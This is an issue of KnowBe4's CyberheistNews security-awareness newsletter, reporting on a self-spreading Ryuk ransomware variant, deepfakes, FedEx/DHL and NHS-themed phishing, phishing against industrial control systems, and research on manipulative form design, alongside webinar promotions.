CyberheistNews Vol 11 #09 [Heads Up] New Ryuk Ransomware Strain Now Worms Itself To All Your Windows LAN Devices

CyberheistNews Vol 11 #09
[Heads Up] New Ryuk Ransomware Strain Now Worms Itself To All Your Windows LAN Devices

A new Ryuk strain has a worm-like feature that allows it to spread to all other devices on victims' local networks. It was discovered by the French CERT, their national cyber-security agency while investigating an attack in early 2021.

"Through the use of scheduled tasks, the malware propagates itself - machine to machine - within the Windows domain," ANSSI (short for Agence Nationale de la Sécurité des Systèmes d'Information) said in a report (PDF). "Once launched, it will thus spread itself on every reachable machine on which Windows RPC accesses are possible."

Ryuk is a ransomware-as-a-service (RaaS) group first spotted in August 2018 that has left behind a long list of victims. It is at the top of the RaaS rankings, with its payloads being discovered in roughly one in three ransomware attacks throughout the last year. The group delivers payloads as part of multi-stage attacks using Emotet, BazarLoader, or TrickBot infection vectors for a quick way into their targets' networks, usually through phishing attacks.

Ryuk affiliates have been behind a massive wave of attacks on the US healthcare system starting with November 2020. They commonly ask for huge ransoms, having collected $34 million from just one victim last year. During the third quarter of 2020, Ryuk affiliates have been observed hitting on average 20 organizations every week.

Self-replication to other network devices

What makes this new Ryuk sample different is its capability to copy itself to other Windows devices on the victims' local networks.

To propagate itself over the local network, the new Ryuk variant lists all the IP addresses in the local ARP cache and sends what looks like Wake-on-LAN (WOL) packets to each of the discovered devices. It then mounts all sharing resources found for each device so that it can encrypt the contents.

Additionally, it can execute itself remotely using scheduled tasks created on each subsequently compromised network host with the help of the legitimate schtasks.exe Windows tool.

The Ryuk variant analyzed in this document does have self-replication capabilities. The propagation is achieved by copying the executable on identified network shares. This step is followed by the creation of a scheduled task on the remote machine. Bleepingcomputer has more detail and some mitigation suggestions, but it's a reboot nightmare and major network disruption if you get hit with one of these.

Blog post with links:
[Live Demo] Ridiculously Easy Security Awareness Training and Phishing

Old-school awareness training does not hack it anymore. Your email filters have an average 7-10% failure rate; you need a strong human firewall as your last line of defense.

Join us TOMORROW, Wednesday, March 3 @ 2:00 PM (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing.

Get a look at new features and see how easy it is to train and phish your users.
  • NEW! AI Recommended training suggestions based on your users’ phishing security test results.
  • NEW! Brandable Content feature gives you the option to add branded custom content to select training modules.
  • NEW! 2021 Training Modules were just published in the ModStore.
  • Did You Know? You can upload your own SCORM training modules into your account for home workers.
  • Active Directory Integration to easily upload user data, eliminating the need to manually manage user changes.
Find out how 35,000+ organizations have mobilized their end-users as their human firewall.

Date/Time: TOMORROW, Wednesday, March 3 @ 2:00 PM (ET)

Save My Spot!
New Scary Good Deepfake Videos of Tom Cruise Show the Threat to Society Is Very Real

InputMag wrote: "We are entering scary times. New deepfake videos of actor Tom Cruise have made their way onto TikTok under the handle @deeptomcruise, and boy do they look real.

They're so realistic, in fact, it's possible that you wouldn't even know they're computer-generated had you not been alerted by the account's handle. And they were made using not much more than sample footage of Cruise and deepfake technology that's getting easier for anyone to use.

Not even two years ago it would have been easy to differentiate between a real and an AI-generated video of somebody. But the technology is advancing so rapidly that we've reached a point of escape velocity, and it's obvious that deepfakery isn't going to be used just for innocent purposes, like animating pictures of your past relatives.

In a series of tweets, our friend Rachel Tobac, the CEO of SocialProof Security, warns that deepfakes like @deeptomcruise threaten to further erode public trust in a world where media literacy is poor and people already can't agree on what's true or false. Like the black and gold dress, where one person might notice giveaways that the Tom Cruise videos are synthesized, another might not know the signs of a fake and swear up and down that they're real.

"Just because you feel you can personally tell the difference between synthetic & authentic media, it doesn’t mean we’re good to go," she says. "It matters what the general public believes."

A powerful technology for nefarious social engineering purposes. KnowBe4's Netflix-quality Inside Man Season 3 Ep 11 shows how deepfakes can be used to hack into networks. You can create a free preview account in our ModStore and see that episode right now. You can also see Rachel Tobac in a series of pretexting videos with our Chief Hacking officer Kevin Mitnick. InputMag has the full story. Check out those TikTok videos!

Blog post with links:
See How You Can Get Audits Done in Half the Time, Half the Cost and Half the Stress

You told us you have challenging compliance requirements, not enough time to get audits done, and keeping up with risk assessments and third-party vendor risk is a continuous problem.

KCM GRC is a SaaS-based platform that includes Compliance, Risk, Policy and Vendor Risk Management modules. KCM was developed to save you the maximum amount of time getting GRC done.

Join us TOMORROW, Wednesday, March 3 @ 1:00 PM (ET), for a 30-minute live product demonstration of KnowBe4's KCM GRC platform. Plus, get a look at new compliance management features we've added to make managing your compliance projects even easier!
  • NEW! Control guidance feature provides in-platform suggestions to help you create controls to meet your specific scopes and requirements.
  • Vet, manage and monitor your third-party vendors' security risk requirements.
  • Simplify risk management with an intuitive interface and simple workflow based on the well-recognized NIST 800-30.
  • Quick implementation with pre-built requirements templates for the most widely used regulations.
  • Dashboards with automated reminders to quickly see what tasks have been completed, not met, and past due.
Date/Time: TOMORROW, Wednesday, March 3 @ 1:00 PM (ET)

Save My Spot!
[Heads Up] Fresh Bogus FedEx and DHL Phishbait

You would think this phishing attack is so old and tired that they would stop using it. But no, it still works like a charm on people that are not trained well enough to spot the red flags. So I'm finding myself after 10 years warning against the same threats. Amazing isn't it?

Researchers at Armorblox describe an ongoing phishing campaign that’s using phony FedEx and DHL shipping notifications as phishing lures.

“A few days ago, the Armorblox threat research team observed an email impersonating FedEx attempt to hit one of our customer environments,” the researchers write. “The email was titled ‘You have a new FedEx sent to you’ followed by the date the email was sent.

The email contained some information about the document to make it seem legitimate, along with links to view the supposed document.”

The emails contained links to the Quip document hosting service, where the attackers had set up a landing page with a link to a spoofed Office 365 login page. The DHL phishing scam used a similar technique.

“The email sender name was ‘DHL Express’ and title was ‘Your parcel has arrived’, including the victim’s email address at the end of the title,” Armorblox says. “The email informed victims that a parcel arrived for them at the post office, and that the parcel couldn’t be delivered due to incorrect delivery details.

The email includes attached shipping documents that victims are guided to check if they want to receive their delivery.” These emails contained an HTML attachment that opened what appeared to be a blurred-out spreadsheet behind an Adobe login box.

The login overlay had the user’s email address pre-filled in the first box, so the researchers believe the attackers were trying to trick the user into entering their email password rather than their Adobe account credentials.

The researchers conclude that people should use a combination of training and technical defenses such as two-factor authentication to defend themselves against these attacks.

Blog post with links:
Hacking Multifactor Authentication: An IT Pro’s Lessons Learned After Testing 150 MFA Products

Multifactor Authentication (MFA) can be a highly effective way to safeguard your organization’s data, but that doesn’t mean it’s unhackable. And nobody knows that better than award-winning author and Data-Driven Defense Evangelist at KnowBe4, Roger Grimes. While researching his most recent book Hacking Multifactor Authentication, Roger tested over 150 MFA solutions. And he wants to share what he learned with you!

Join Roger as he discusses the good, the bad, and the ugly lessons he learned from his research. He’ll share with you what works, what doesn’t, and what you should absolutely avoid.

In this webinar you’ll learn about:
  • Differences between various MFA tools and why they matter
  • Real-world hacking techniques Roger used to expose MFA weaknesses
  • What makes MFA software weak or strong and what that means to you
  • Tips on choosing the best MFA software for your company
  • Why a strong human firewall is your best last line of defense
Get the details you need to know to become a better IT security defender. Plus, earn CPE credit for attending!

Date/Time: Wednesday, March 10 @ 2:00 PM (ET)

Save My Spot!
New Scientific Research Helps CISOs Quantify The Value of a Strong Security Culture

Bradley Barth as SC Magazine reported: "Building a security awareness training program to develop a strong InfoSec culture requires time and money, and chief information security officers frequently try to make a case for such an investment by citing return on investment and other metrics of success.

Such demonstrable proof can be elusive, but this week, KnowBe4 researchers released the results of a comprehensive study examining the behavior and security culture of more than 97,000 employees across 1,115 organizations worldwide.

The goal was to see if they could quantify the correlation between implementing a strong security culture and the reduction of unwanted phishing behaviors such as link clicking and credential sharing. Obviously, they have an inversely proportional relationship: as training and awareness improve, risky behaviors go down. But by how much?

Now we know: KnowBe4 found that employees at companies with good security culture/training were 52x less likely to practice risky credential sharing behaviors than workers at companies with poor security culture/training.

KnowBe4 claims its study is the first to ever fully quantify this correlation, noting that researchers compiled the data by measuring the behaviors of employees a phishing assessment platform, and then combining those results with responses from a scientific security culture survey."

Full article with links to the study (PDF, no registration required):

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"The search for the truth is the most important work in the whole world,
and the most dangerous."

- James Clavell - Writer (1924 - 1994)

"Success is not the key to happiness. Happiness is the key to success.
If you love what you are doing, you will be successful."

- Albert Schweitzer - Humanitarian (1875 - 1965)

Thanks for reading CyberheistNews

Security News
Phishing Targets Industrial Control Systems

Phishing continues to be a primary initial access vector in cyberattacks against industrial control systems, according to researchers at Dragos. Out of the fifteen threat groups tracked by the security firm, ten rely on spearphishing attachments to compromise their victims, and thirteen abuse valid accounts to maintain persistence.

STIBNITE, a threat actor that targets wind turbine companies in Azerbaijan, uses fake login pages and malware-laden documents to compromise its victims. “STIBNITE gains initial access via credential theft websites spoofing Azerbaijan government organizations and phishing campaigns using variants of malicious Microsoft Office documents,” Dragos says.

“STIBNITE also used information related to the global COVID-19 pandemic for malicious document themes.” TALONITE, a threat group that focuses on the US electric sector, uses spearphishing to deliver malicious documents.

“TALONITE’s phishing campaigns utilize electric and power grid engineering specific themes and concepts, indicating an intent to gain a foothold within energy sector entities,” the researchers write. “Such access could facilitate gathering host and identity information, collecting sensitive operational data, or mapping the enterprise environment to identify points of contact with ICS.

The identified infrastructure and phishing emails spoofed the National Council of Examiners for Engineering and Surveying (NCEES), North American Electric Reliability Corporation (NERC), the American Society of Civil Engineers (ASCE), and Global Energy Certification (GEC).”

Dragos stresses that malicious cyber activity targeting industrial control systems is increasing, with four new ICS-targeting threat actors spotted in 2020.

“Data from our YIR report shows that this trend corresponds with a 3X rise in ICS-focused threats,” said Dragos’ CEO, Robert M. Lee. “The convergence of an increasingly ICS-aware and capable threat landscape with the trend towards more network connectivity means that the practical observations and lessons learned contained in our 2020 YIR report are timely as the community continues to work to provide safe and reliable operations.

Dragos has the story:
How to Trick People Into Handing Over Their Information

The layout of online forms has a significant impact on how likely users are to hand over their personal information, according to Professor Lior Fink from Ben-Gurion University. On the CyberWire’s Hacking Humans podcast, Professor Fink described an experiment in which users were convinced to submit their personal information through a sign-up form.

The researchers found that users were more likely to enter their information if the form was arranged in a certain manner. “One thing was to simply arrange the items in an ascending privacy intrusion order,” Fink said. “We ordered the items of the information that they are asked to provide first is their less intrusive information, and then the items are arranged in an increasing order, and the last items are those that require the most sensitive information.”

The users were also more likely to enter their details if the sign-up form spanned multiple pages, since the intended marks would be likely to feel that they had already committed to the process.

“The second mechanism was to break down information items across several pages,” Fink said. “So instead of having the entire form on one page, they had to answer a question – each question appeared on a different page, and they had to submit their answers for each question separately. So the idea was to draw the one-foot-in-the-door theory.

So it's the same way as the marketing person wants to put the foot in the door and ask you to do something small to increase the likelihood that you'll do something larger. We applied the same principles and ideas in those online forms. So we ask for smaller things at the beginning to increase the likelihood that they will continue and fill out the entire form.”

Fink explained that using multiple pages could also trick the user into submitting information without feeling like they had sent anything. “The idea behind a multiple-page manipulation was, as long as you don't submit the form or move across pages, the information is still yours, right?” Fink said.

“I mean, you still haven't submitted it. It's still just text you put in a form. But then once you press – move to the next page, basically the info was sent to the server, probably placed in the database. So you already sort of revealed something about yourself.”

These techniques aren’t inherently malicious, but attackers use similar tactics in phishing attacks. Fink concluded that people should focus on learning when to pay closer attention to what they’re doing in order to avoid handing over sensitive information.

“In a lot of the literature on your heuristics and biases, awareness is an important thing,” Fink said. “But, I mean, it's one thing to say that awareness is important and another thing to say how to actually increase awareness.

Because we are doing a lot of things during the day, we're very cognitively busy, and we want to be very efficient in what we do, so a lot of times we've learned to do things without proper attention. So I guess that the best recommendation would be to simply identify the instances when you need to invest more attention in things.”

New-school security awareness training can help your employees avoid falling for phishing attacks by teaching them how to recognize social engineering tactics.

The CyberWire has the story:
More NHS-Themed COVID-19 Vaccine Phishing

A phishing campaign spoofing the UK’s National Health Service has surged its output, Infosecurity Magazine reports. Researchers at Mimecast warn that the attackers behind the campaign are sending 350% more emails than previously observed.

“The latest campaign informs recipients they have been selected for a jab based on family and medical history, using the trusted brand of the Health Service and the promise of protection from the deadly virus to socially engineer victims,” Infosecurity writes. “Information including name, date of birth and credit card details handed over by any unsuspecting recipients can then be sold on the dark web and/or used in follow-on fraud, according to Mimecast.”

Carl Wearn, head of e-crime at Mimecast, told the publication that social engineering is a key part of most cyberattacks.

“The majority of online scams rely on some form of human error, as it is far easier to compromise a single user than a whole system,” Wearn said. “Threat actors know this well and are continuing to exploit the human factor by tailoring scams to target current events and the fears of their victims.

Cyber-criminals are clever and continuously adapting their tactics. Don't click on suspicious links and never open unexpected email attachments. If you are concerned about whether vaccine information is legitimate, call your GP or take an independent route to check the website.”

These types of phishing scams can be expected to continue as vaccines are rolled out around the world. Some of these scams try to convince the user to hand over their personal and financial information, while others attempt to trick the victim into installing malware. Others simply try to get the user to pay money for a phony offer of a vaccine.

New-school security awareness training can help your employees recognize and thwart social engineering attacks in their personal and professional lives.

Infosecurity Magazine has the story:
What KnowBe4 Customers Say

PhishER is an essential part of your critical security workstream that saves the Incident Response team a huge amount of time.

Question: "How much time do you spend active inside of PhishER and how many messages do you get daily?

Answer: "We may spend about an hour in the console among 5 people during the course of a week. We receive anywhere from 40 to 100+ reports a day. We average around 1000-1500 reports a month.

We have set our PML scores relatively low so more than 90% of our reported items get auto resolved via AI/ML and/or the actions I have made.

When AI/ML isn’t confident enough, our analysts get alerted to manually triage. We call these “undetermined emails”. This is what the hour a week is spent on."

Discuss this topic at KnowBe4's HackBusters Users Forum:
The 10 Interesting News Items This Week
    1. Hack of Software Provider Accellion Sets Off Global Ripple Effects:

    2. Why boards of private businesses must prioritize cybersecurity:

    3. We would not survive a true first strike cyberattack:

    4. Global Accellion data breaches linked to Clop ransomware gang:

    5. Hackers Tied to Russia's GRU Targeted the US Grid for Years:

    6. New 'LazyScripter' Hacking Group Targets Airlines:

    7. Reuters: Chinese spyware code was copied from America's NSA:

    8. Cybercrime groups are selling their hacking skills. Some countries are buying:

    9. New malware found on 30,000 Macs has security pros stumped:

    10. Clubhouse Chats Are Breached, Raising Concerns Over Security:
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

FOLLOW US ON: Twitter | LinkedIn | YouTube
Copyright © 2014-2021 KnowBe4, Inc. All rights reserved.

Subscribe To Our Blog

Ransomware Hostage Rescue Manual

Get the latest about social engineering

Subscribe to CyberheistNews